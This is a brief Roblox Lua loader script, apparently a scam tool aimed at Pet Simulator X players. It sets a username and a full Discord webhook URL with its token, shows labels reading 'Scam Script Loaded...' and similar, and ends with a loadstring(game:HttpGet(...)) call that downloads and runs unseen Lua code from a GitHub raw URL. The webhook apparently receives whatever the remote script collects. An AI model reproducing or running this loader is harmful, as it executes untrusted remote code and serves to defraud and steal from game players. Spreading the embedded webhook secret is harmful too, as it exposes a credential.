Username = "qZenxy"
WebHook = "https://discord.com/api/webhooks/1079865250565853265/om4JTANZp2VlW-mtonQCLqKqrvXQsRhpeMaNhD-svqxHb3vlOs9u-NFkdLiKBngshAzb"


_G.CustomScriptName = "Xyz Hub"
_G.Text1 = "Scam Script Loaded..."
_G.Text2 = "Waiting for Scam Script"
_G.Text3 = "Checking Scam Scripts..."
_G.Text4 = "Starting Scam Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
